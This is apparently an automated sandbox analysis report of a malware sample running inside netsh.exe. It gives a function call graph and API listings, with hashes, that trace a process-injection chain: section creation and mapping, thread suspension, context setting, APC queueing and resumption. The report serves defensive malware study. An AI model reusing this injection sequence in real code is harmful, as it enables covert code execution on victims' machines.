LdrLoadDll 106985->106987 106986->106743 106987->106986 106989 407eb0 106988->106989 106990 407eab 106988->106990 106991 41bd40 LdrLoadDll 106989->106991 106990->106671 106992 407ed5 106991->106992 106993 407f38 106992->106993 106994 419ec0 2 API calls 106992->106994 106995 407f3e 106992->106995 106999 41bd40 LdrLoadDll 106992->106999 107004 41a5c0 106992->107004 106993->106671 106994->106992 106997 407f64 106995->106997 106998 41a5c0 2 API calls 106995->106998 106997->106671 107000 407f55 106998->107000 106999->106992 107000->106671 107002 41a5c0 2 API calls 107001->107002 107003 40817e 107002->107003 107003->106628 107005 41af60 LdrLoadDll 107004->107005 107006 41a5dc 107005->107006 107009 d92c70 LdrInitializeThunk 107006->107009 107007 41a5f3 107007->106992 107009->107007 107011 41b5c3 107010->107011 107012 40acf0 LdrLoadDll 107011->107012 107013 409c4a 107012->107013 107013->106634 107015 40b063 107014->107015 107017 40b0e0 107015->107017 107029 419c90 LdrLoadDll 107015->107029 107017->106641 107019 41af60 LdrLoadDll 107018->107019 107020 40f1bb 107019->107020 107020->106649 107021 41a7d0 107020->107021 107022 41a7ef LookupPrivilegeValueW 107021->107022 107023 41af60 LdrLoadDll 107021->107023 107022->106645 107023->107022 107025 41a27c 107024->107025 107026 41af60 LdrLoadDll 107024->107026 107030 d92ea0 LdrInitializeThunk 107025->107030 107026->107025 107027 41a29b 107027->106648 107029->107017 107030->107027 107032 40b1f0 107031->107032 107033 40b040 LdrLoadDll 107032->107033 107034 40b204 107033->107034 107034->106581 107036 40af34 107035->107036 107108 419c90 LdrLoadDll 107036->107108 107038 40af6e 107038->106583 107040 40f3ac 107039->107040 107041 40b1c0 LdrLoadDll 107040->107041 107042 40f3be 107041->107042 107109 40f290 107042->107109 107045 40f3f1 107048 40f402 107045->107048 107050 41a490 2 API calls 107045->107050 107046 40f3d9 107047 40f3e4 107046->107047 107049 41a490 2 API calls 107046->107049 107047->106587 107048->106587 107049->107047 107050->107048 107052 40f43c 107051->107052 107125 40b2b0 107052->107125 107054 40f44e 107055 40f290 2 API calls 107054->107055 107056 40f45f 107055->107056 107058 40f481 107056->107058 107060 40f469 107056->107060 107057 40f492 107057->106589 107058->107057 107062 41a490 2 API calls 107058->107062 107059 40f474 107059->106589 107060->107059 107061 41a490 2 API calls 107060->107061 107061->107059 107062->107057 107064 40caa6 107063->107064 107065 40cab0 107063->107065 107064->106597 107066 40af10 LdrLoadDll 107065->107066 107067 40cb4e 107066->107067 107068 40cb74 107067->107068 107069 40b040 LdrLoadDll 107067->107069 107068->106597 107070 40cb90 107069->107070 107071 414a50 8 API calls 107070->107071 107072 40cbe5 107071->107072 107072->106597 107074 40d646 107073->107074 107075 40b040 LdrLoadDll 107074->107075 107076 40d65a 107075->107076 107129 40d310 107076->107129 107078 40908b 107079 40cc00 107078->107079 107080 40cc26 107079->107080 107081 40b040 LdrLoadDll 107080->107081 107082 40cca9 107080->107082 107081->107082 107083 40b040 LdrLoadDll 107082->107083 107084 40cd16 107083->107084 107085 40af10 LdrLoadDll 107084->107085 107086 40cd7f 107085->107086 107087 40b040 LdrLoadDll 107086->107087 107088 40ce2f 107087->107088 107088->106610 107092 408d14 107089->107092 107158 40f6d0 107089->107158 107091 408f25 107091->106568 107092->107091 107163 4143a0 107092->107163 107094 408d70 107094->107091 107166 408ab0 107094->107166 107097 41cf30 2 API calls 107098 408db2 107097->107098 107099 41d060 3 API calls 107098->107099 107101 408dc7 107099->107101 107100 407ea0 3 API calls 107100->107101 107101->107091 107101->107100 107104 408160 2 API calls 107101->107104 107105 40c7b0 16 API calls 107101->107105 107171 40f670 107101->107171 107175 40f080 19 API calls 107101->107175 107104->107101 107105->107101 107106->106585 107107->106608 107108->107038 107110 40f2aa 107109->107110 107118 40f360 107109->107118 107111 40b040 LdrLoadDll 107110->107111 107112 40f2cc 107111->107112 107119 419f40 107112->107119 107114 40f30e 107122 419f80 107114->107122 107117 41a490 2 API calls 107117->107118 107118->107045 107118->107046 107120 41af60 LdrLoadDll 107119->107120 107121 419f5c 107120->107121 107121->107114 107123 40f354 107122->107123 107124 41af60 LdrLoadDll 107122->107124 107123->107117 107124->107123 107126 40b2d7 107125->107126 107127 40b040 LdrLoadDll 107126->107127 107128 40b313 107127->107128 107128->107054 107130 40d327 107129->107130 107138 40f710 107130->107138 107134 40d39b 107135 40d3a2 107134->107135 107149 41a2a0 LdrLoadDll 107134->107149 107135->107078 107137 40d3b5 107137->107078 107139 40f735 107138->107139 107150 4081a0 107139->107150 107141 40f759 107142 414a50 8 API calls 107141->107142 107143 40d36f 107141->107143 107145 41bdc0 2 API calls 107141->107145 107157 40f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 107141->107157 107142->107141 107146 41a6e0 107143->107146 107145->107141 107147 41af60 LdrLoadDll 107146->107147 107148 41a6ff CreateProcessInternalW 107147->107148 107148->107134 107149->107137 107153 4081a1 107150->107153 107151 40829f 107151->107141 107152 414a50 8 API calls 107154 408222 107152->107154 107153->107151 107153->107152 107155 41bdc0 2 API calls 107154->107155 107156 408249 107154->107156 107155->107156 107156->107141 107157->107141 107159 40f6ef 107158->107159 107160 414e50 LdrLoadDll 107158->107160 107161 40f6f6 SetErrorMode 107159->107161 107162 40f6fd 107159->107162 107160->107159 107161->107162 107162->107092 107165 4143c6 107163->107165 107176 40f4a0 107163->107176 107165->107094 107167 41bd40 LdrLoadDll 107166->107167 107170 408ad5 107166->107170 107167->107170 107168 408cea 107168->107097 107170->107168 107195 419880 107170->107195 107172 40f683 107171->107172 107243 419e90 107172->107243 107175->107101 107177 40f4bd 107176->107177 107183 419fc0 107177->107183 107180 40f505 107180->107165 107184 41af60 LdrLoadDll 107183->107184 107185 419fdc 107184->107185 107193 d92f30 LdrInitializeThunk 107185->107193 107186 40f4fe 107186->107180 107188 41a010 107186->107188 107189 41a02c 107188->107189 107190 41af60 LdrLoadDll 107188->107190 107194 d92d10 LdrInitializeThunk 107189->107194 107190->107189 107191 40f52e 107191->107165 107193->107186 107194->107191 107196 41bf90 2 API calls 107195->107196 107197 419897 107196->107197 107216 409310 107197->107216 107199 4198b2 107200 4198f0 107199->107200 107201 4198d9 107199->107201 107204 41bd40 LdrLoadDll 107200->107204 107202 41bdc0 2 API calls 107201->107202 107203 4198e6 107202->107203 107203->107168 107205 41992a 107204->107205 107206 41bd40 LdrLoadDll 107205->107206 107207 419943 107206->107207 107213 419be4 107207->107213 107222 41bd80 LdrLoadDll 107207->107222 107209 419bc9 107210 419bd0 107209->107210 107209->107213 107211 41bdc0 2 API calls 107210->107211 107212 419bda 107211->107212 107212->107168 107214 41bdc0 2 API calls 107213->107214 107215 419c39 107214->107215 107215->107168 107217 409335 107216->107217 107218 40acf0 LdrLoadDll 107217->107218 107219 409368 107218->107219 107221 40938d 107219->107221 107223 40cf20 107219->107223 107221->107199 107222->107209 107224 40cf4c 107223->107224 107225 41a1e0 LdrLoadDll 107224->107225 107226 40cf65 107225->107226 107227 40cf6c 107226->107227 107234 41a220 107226->107234 107227->107221 107231 40cfa7 107232 41a490 2 API calls 107231->107232 107233 40cfca 107232->107233 107233->107221 107235 41a23c 107234->107235 107236 41af60 LdrLoadDll 107234->107236 107242 d92ca0 LdrInitializeThunk 107235->107242 107236->107235 107237 40cf8f 107237->107227 107239 41a810 107237->107239 107240 41af60 LdrLoadDll 107239->107240 107241 41a82f 107240->107241 107241->107231 107242->107237 107244 41af60 LdrLoadDll 107243->107244 107245 419eac 107244->107245 107248 d92dd0 LdrInitializeThunk 107245->107248 107246 40f6ae 107246->107101 107248->107246 107249 bbcb84 107252 bba042 107249->107252 107251 bbcba5 107253 bba06b 107252->107253 107254 bba182 NtQueryInformationProcess 107253->107254 107269 bba56c 107253->107269 107256 bba1ba 107254->107256 107255 bba1ef 107255->107251 107256->107255 107257 bba2db 107256->107257 107258 bba290 107256->107258 107259 bba2fc NtSuspendThread 107257->107259 107281 bb9de2 NtCreateSection NtMapViewOfSection NtClose 107258->107281 107261 bba30d 107259->107261 107263 bba331 107259->107263 107261->107251 107262 bba2cf 107262->107251 107266 bba412 107263->107266 107272 bb9bb2 107263->107272 107265 bba531 107268 bba552 NtResumeThread 107265->107268 107266->107265 107267 bba4a6 NtSetContextThread 107266->107267 107271 bba4bd 107267->107271 107268->107269 107269->107251 107270 bba51c RtlQueueApcWow64Thread 107270->107265 107271->107265 107271->107270 107273 bb9bf7 107272->107273 107274 bb9c66 NtCreateSection 107273->107274 107275 bb9ca0 107274->107275 107277 bb9d4e 107274->107277 107276 bb9cc1 NtMapViewOfSection 107275->107276 107276->107277 107278 bb9d0c 107276->107278 107277->107266 107278->107277 107279 bb9d88 107278->107279 107280 bb9dc5 NtClose 107279->107280 107280->107266 107281->107262

              Executed Functions

              Function 00BBA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • NtQueryInformationProcess.NTDLL ref: 00BBA19F
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: InformationProcessQuery
              • String ID: 0
              • API String ID: 1778838933-4108050209
              • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
              • Instruction ID: 5a17ac47d4446cff0b0bf7587f414be0313039bc8971e61d5db43fc4cf346f7c
              • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
              • Instruction Fuzzy Hash: 01F15270918A4C8FDBA9EF68C894AEEB7E0FF98304F40466AE44ED7251DF749641CB41
              Function 00BB9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 291 bb9baf-bb9bef 292 bb9bf7-bb9bfe 291->292 293 bb9bf2 call bb9102 291->293 294 bb9c0c-bb9c9a call bbb942 * 2 NtCreateSection 292->294 295 bb9c00 292->295 293->292 301 bb9d5a-bb9d68 294->301 302 bb9ca0-bb9d0a call bbb942 NtMapViewOfSection 294->302 296 bb9c02-bb9c0a 295->296 296->294 296->296 305 bb9d0c-bb9d4c 302->305 306 bb9d52 302->306 308 bb9d69-bb9d6b 305->308 309 bb9d4e-bb9d4f 305->309 306->301 310 bb9d88-bb9ddc call bbcd62 NtClose 308->310 311 bb9d6d-bb9d72 308->311 309->306 312 bb9d74-bb9d86 call bb9172 311->312 312->310
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: Section$CloseCreateView
              • String ID: @$@
              • API String ID: 1133238012-149943524
              • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
              • Instruction ID: 14666e09cb98f059f4ff8b3f78dd0c55145f00eab6fb0bc12c2dad947bdd40dc
              • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
              • Instruction Fuzzy Hash: 06619170218B088FCB58EF68D8856AABBE0FF98314F50062EE58AC3251DF75D441CB86
              Function 00BB9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 350 bb9bb2-bb9bfe call bb9102 353 bb9c0c-bb9c9a call bbb942 * 2 NtCreateSection 350->353 354 bb9c00 350->354 360 bb9d5a-bb9d68 353->360 361 bb9ca0-bb9d0a call bbb942 NtMapViewOfSection 353->361 355 bb9c02-bb9c0a 354->355 355->353 355->355 364 bb9d0c-bb9d4c 361->364 365 bb9d52 361->365 367 bb9d69-bb9d6b 364->367 368 bb9d4e-bb9d4f 364->368 365->360 369 bb9d88-bb9ddc call bbcd62 NtClose 367->369 370 bb9d6d-bb9d72 367->370 368->365 371 bb9d74-bb9d86 call bb9172 370->371 371->369
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: Section$CreateView
              • String ID: @$@
              • API String ID: 1585966358-149943524
              • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
              • Instruction ID: b11fb2c1858eb2ef02c575bbf3ee3d0d61f9491565a7070e94a1793e8506bde2
              • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
              • Instruction Fuzzy Hash: 0B518E70618B088FDB58DF18D885AAABBE0FB98314F50062EF98AC3651DF75D441CB86
              Function 00BBA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • NtQueryInformationProcess.NTDLL ref: 00BBA19F
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: InformationProcessQuery
              • String ID: 0
              • API String ID: 1778838933-4108050209
              • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
              • Instruction ID: fff8ee8f2a6ea9535e6d41e91ce26b309383cf80f88952f39e9a3138b581d12b
              • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
              • Instruction Fuzzy Hash: 60515D70918A8C8FDBA9EF68C8846EEBBF4FB98305F40422ED44AD7211DF709645CB41
              Function 0041A35F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 628 41a35f-41a3b1 call 41af60 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,00414BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00414BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041A3AD
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: fed1d1309162db8d0a747d187bc6f9ad4c96d1cc1fdd8183c8b47b824c70450f
              • Instruction ID: b0ea305ca0179594be26f88849999d72c403b9e7c25092e2012cfb502ab0554f
              • Opcode Fuzzy Hash: fed1d1309162db8d0a747d187bc6f9ad4c96d1cc1fdd8183c8b47b824c70450f
              • Instruction Fuzzy Hash: FEF0BDB2205208AFCB48CF88DC85EEB37EDAF8C754F158248BA0DD7241D630E8518BA4
              Function 0041A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 631 41a360-41a376 632 41a37c-41a3b1 NtCreateFile 631->632 633 41a377 call 41af60 631->633 633->632
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,00414BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00414BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041A3AD
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
              Function 0041A40A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 634 41a40a-41a459 call 41af60 NtReadFile
              APIs
              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA
              • API String ID: 2738559852-3517284412
              • Opcode ID: a7d9e67bc0a7f934f25e98d71784c61da8d6ac106cdc2fb5df1c2e41c41e999a
              • Instruction ID: d9f3efcc6fba735fe827f6fd57d323a72c1d16cfd7affead5f3e42ca52de0d7b
              • Opcode Fuzzy Hash: a7d9e67bc0a7f934f25e98d71784c61da8d6ac106cdc2fb5df1c2e41c41e999a
              • Instruction Fuzzy Hash: 81F0A9B2200208AFCB14DF99DC81DEB77A9EF8C754F158249BA1DA7241D634E951CBE4
              Function 0041A410 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 637 41a410-41a426 638 41a42c-41a459 NtReadFile 637->638 639 41a427 call 41af60 637->639 639->638
              APIs
              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA
              • API String ID: 2738559852-3517284412
              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
              Function 0041A48A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID: PMA
              • API String ID: 3535843008-3622942700
              • Opcode ID: 6866c63e7f77f1cf9f4179088a192caf9762c1937d793d073a03901159387ab9
              • Instruction ID: eea82b31076ec0d138028a2a42476fb395de81841b37d259ef3cf74a12bfe863
              • Opcode Fuzzy Hash: 6866c63e7f77f1cf9f4179088a192caf9762c1937d793d073a03901159387ab9
              • Instruction Fuzzy Hash: 93E086712001147FD711DFA8DC45EE73B6CEF88730F244559B91D97291D130E6118790
              Function 0041A490 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID: PMA
              • API String ID: 3535843008-3622942700
              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
              Function 00D92AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4be22ec3e1fc31eca0e1a459f615abd0ab95e78ebfb9a13994c7ebccd56749bf
              • Instruction ID: 7af77ddad12162e02e4ba321ec78eeb8ea7ff21d4ccaa1923c63211a8aa14c91
              • Opcode Fuzzy Hash: 4be22ec3e1fc31eca0e1a459f615abd0ab95e78ebfb9a13994c7ebccd56749bf
              • Instruction Fuzzy Hash: 76900265711400030305B5980704507004687D6351355C032F5015660CDA2189616131
              Function 00D92B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4efdfa5da2537f61c8238ba322e23a2636802e8eb6ff5d22da937d8b8d624e7f
              • Instruction ID: 176f7b0660fff39f2cc03aff0d58a4c211ff44cc1d8f485bf0dce2796f979a52
              • Opcode Fuzzy Hash: 4efdfa5da2537f61c8238ba322e23a2636802e8eb6ff5d22da937d8b8d624e7f
              • Instruction Fuzzy Hash: C39002A170240003430571984414616400A87E1301B55C032E50146A0DC92589917135
              Function 00D92CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: fb0ec110ce3797c1a4c922a0002a52fefeeee01efe517bca13f7ee07c89eead5
              • Instruction ID: e42871014d93576d6c2ce4f0b95aca71a5ccaf7568ab3cc15d4e7fd181286b88
              • Opcode Fuzzy Hash: fb0ec110ce3797c1a4c922a0002a52fefeeee01efe517bca13f7ee07c89eead5
              • Instruction Fuzzy Hash: FC90027170140402D30075D85408646000587E1301F55D022A9024665ECA6589917131
              Function 00D92C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4b4ea7ddacc6f00b774e3f8ece7590fe93c097cba817312a6e2fb110543dc0f0
              • Instruction ID: 31fa624e013c9f692e59b63f237f74249370a5cd01f3908e7ae8c2410f2fe37f
              • Opcode Fuzzy Hash: 4b4ea7ddacc6f00b774e3f8ece7590fe93c097cba817312a6e2fb110543dc0f0
              • Instruction Fuzzy Hash: EE90027170148802D3107198840474A000587D1301F59C422A8424768D8A9589917131
              Function 00D92C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: cba2b906c13d3f62dc91a2306c252adbc58f32c6b38c10c5952bd08dd560cd32
              • Instruction ID: e752fa3d85784412e01bb0f8b9bc52cc0da7f4bf89a1ef2e5c94efdb2e438a1f
              • Opcode Fuzzy Hash: cba2b906c13d3f62dc91a2306c252adbc58f32c6b38c10c5952bd08dd560cd32
              • Instruction Fuzzy Hash: 0990027170140842D30071984404B46000587E1301F55C027A4124764D8A15C9517531
              Function 00D92DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: bc78dc8d327685947d4d04467d9f9a239eac012a421f315c7ddaf67464b4ba22
              • Instruction ID: 08e08f821b6f2b1864c3e873fc5f5999e69fe0be0e14cdd45ecdcb335525713d
              • Opcode Fuzzy Hash: bc78dc8d327685947d4d04467d9f9a239eac012a421f315c7ddaf67464b4ba22
              • Instruction Fuzzy Hash: 5F900261742441525745B1984404507400697E1341795C023A5414A60C89269956E631
              Function 00D92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 177b11e0f5006f27c855d3f6b1558fce49e463eadc91e790ba18d62ca4f92dc7
              • Instruction ID: 825959cccd5274cfb6af818e61d8358855080d8fce91166e9752c04243dcad26
              • Opcode Fuzzy Hash: 177b11e0f5006f27c855d3f6b1558fce49e463eadc91e790ba18d62ca4f92dc7
              • Instruction Fuzzy Hash: FA90027170140413D31171984504707000987D1341F95C423A4424668D9A568A52B131
